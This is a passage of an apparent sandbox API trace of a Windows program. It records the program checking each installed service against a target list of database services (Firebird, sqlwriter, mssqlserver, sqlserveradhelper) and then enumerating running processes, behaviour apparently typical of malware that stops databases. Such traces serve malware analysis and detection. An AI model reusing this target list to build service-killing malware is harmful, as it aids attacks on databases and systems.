lpString2="CoreMessagingRegistrar") returned 1 [0199.486] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0199.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0199.486] lstrlenW (lpString="CryptSvc") returned 8 [0199.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0199.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0199.486] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0199.486] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0199.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0199.486] lstrlenW (lpString="DcomLaunch") returned 10 [0199.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0199.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0199.486] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0199.486] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0199.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0199.486] lstrlenW (lpString="DeviceAssociationService") returned 24 [0199.486] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0199.486] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0199.486] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0199.486] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0199.486] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0199.487] lstrlenW (lpString="Dhcp") returned 4 [0199.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0199.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0199.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0199.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0199.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0199.487] lstrlenW (lpString="Dnscache") returned 8 [0199.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0199.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0199.487] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0199.487] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0199.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0199.487] lstrlenW (lpString="DPS") returned 3 [0199.487] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0199.487] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0199.487] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0199.487] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0199.487] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0199.487] lstrlenW (lpString="DusmSvc") returned 7 [0199.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0199.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0199.488] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0199.488] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0199.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0199.488] lstrlenW (lpString="EventLog") returned 8 [0199.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0199.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0199.488] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0199.488] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0199.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0199.488] lstrlenW (lpString="EventSystem") returned 11 [0199.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0199.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0199.488] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0199.488] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0199.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0199.488] lstrlenW (lpString="FontCache") returned 9 [0199.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0199.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0199.488] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0199.488] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0199.488] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0199.488] lstrlenW (lpString="gpsvc") returned 5 [0199.488] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0199.488] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0199.489] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0199.489] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0199.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0199.489] lstrlenW (lpString="iphlpsvc") returned 8 [0199.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0199.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0199.489] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0199.489] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0199.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0199.489] lstrlenW (lpString="KeyIso") returned 6 [0199.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0199.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0199.489] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0199.489] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0199.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0199.489] lstrlenW (lpString="LanmanServer") returned 12 [0199.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0199.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0199.489] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0199.489] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0199.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0199.489] lstrlenW (lpString="LanmanWorkstation") returned 17 [0199.489] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0199.489] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0199.489] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0199.489] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0199.489] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0199.489] lstrlenW (lpString="lfsvc") returned 5 [0199.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0199.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0199.490] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0199.490] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0199.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0199.490] lstrlenW (lpString="lmhosts") returned 7 [0199.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0199.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0199.490] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0199.490] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0199.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0199.490] lstrlenW (lpString="LSM") returned 3 [0199.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0199.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0199.490] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0199.490] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0199.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0199.490] lstrlenW (lpString="MpsSvc") returned 6 [0199.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0199.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0199.490] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0199.490] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0199.490] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0199.490] lstrlenW (lpString="NcbService") returned 10 [0199.490] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0199.490] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0199.490] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0199.491] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0199.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0199.491] lstrlenW (lpString="netprofm") returned 8 [0199.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0199.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0199.491] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0199.491] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0199.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0199.491] lstrlenW (lpString="NgcSvc") returned 6 [0199.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0199.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0199.491] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0199.491] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0199.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0199.491] lstrlenW (lpString="NlaSvc") returned 6 [0199.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0199.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0199.491] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0199.491] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0199.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0199.491] lstrlenW (lpString="nsi") returned 3 [0199.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0199.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0199.491] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0199.491] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0199.491] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0199.491] lstrlenW (lpString="PcaSvc") returned 6 [0199.491] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0199.491] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0199.491] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0199.491] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0199.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0199.492] lstrlenW (lpString="PlugPlay") returned 8 [0199.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0199.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0199.492] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0199.492] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0199.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0199.492] lstrlenW (lpString="Power") returned 5 [0199.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0199.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0199.492] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0199.492] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0199.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0199.492] lstrlenW (lpString="ProfSvc") returned 7 [0199.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0199.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0199.492] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0199.492] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0199.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0199.492] lstrlenW (lpString="RpcEptMapper") returned 12 [0199.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0199.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0199.492] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0199.492] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0199.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0199.492] lstrlenW (lpString="RpcSs") returned 5 [0199.492] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0199.492] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0199.492] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0199.492] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0199.492] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0199.492] lstrlenW (lpString="SamSs") returned 5 [0199.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0199.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0199.493] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0199.493] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0199.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0199.493] lstrlenW (lpString="Schedule") returned 8 [0199.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0199.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0199.493] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0199.493] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0199.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0199.493] lstrlenW (lpString="SecurityHealthService") returned 21 [0199.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0199.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0199.493] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0199.493] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0199.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0199.493] lstrlenW (lpString="SENS") returned 4 [0199.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0199.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0199.493] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0199.493] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0199.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0199.493] lstrlenW (lpString="ShellHWDetection") returned 16 [0199.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0199.493] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0199.493] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0199.493] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0199.493] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0199.493] lstrlenW (lpString="Spooler") returned 7 [0199.493] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0199.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0199.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0199.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0199.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0199.494] lstrlenW (lpString="StateRepository") returned 15 [0199.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0199.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0199.494] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0199.494] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0199.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0199.494] lstrlenW (lpString="SysMain") returned 7 [0199.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0199.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0199.494] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0199.494] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0199.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0199.494] lstrlenW (lpString="SystemEventsBroker") returned 18 [0199.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0199.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0199.494] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0199.494] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0199.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0199.494] lstrlenW (lpString="Themes") returned 6 [0199.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0199.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0199.494] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0199.494] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0199.494] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0199.494] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0199.494] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0199.494] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0199.495] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0199.495] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0199.495] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x394 [0199.497] Process32FirstW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0199.498] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0199.498] lstrlenW (lpString="System") returned 6 [0199.499] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0199.499] lstrlenW (lpString="smss.exe") returned 8 [0199.499] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.500] lstrlenW (lpString="csrss.exe") returned 9 [0199.500] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0199.500] lstrlenW (lpString="wininit.exe") returned 11 [0199.500] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0199.501] lstrlenW (lpString="csrss.exe") returned 9 [0199.501] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0199.502] lstrlenW (lpString="winlogon.exe") returned 12 [0199.502] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0199.502] lstrlenW (lpString="services.exe") returned 12 [0199.502] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0199.504] lstrlenW (lpString="lsass.exe") returned 9 [0199.504] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0199.504] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0199.504] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0199.505] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0199.505] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.505] lstrlenW (lpString="svchost.exe") returned 11 [0199.506] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.506] lstrlenW (lpString="svchost.exe") returned 11 [0199.506] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0199.507] lstrlenW (lpString="dwm.exe") returned 7 [0199.507] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.508] lstrlenW (lpString="svchost.exe") returned 11 [0199.508] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.508] lstrlenW (lpString="svchost.exe") returned 11 [0199.509] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.509] lstrlenW (lpString="svchost.exe") returned 11 [0199.509] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.510] lstrlenW (lpString="svchost.exe") returned 11 [0199.510] Process32NextW (in: hSnapshot=0x394, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0199.510] lstrlenW (lpString="svchost.exe") returned 11 [0199.510] Process32NextW (in: hSnapshot=0x394, 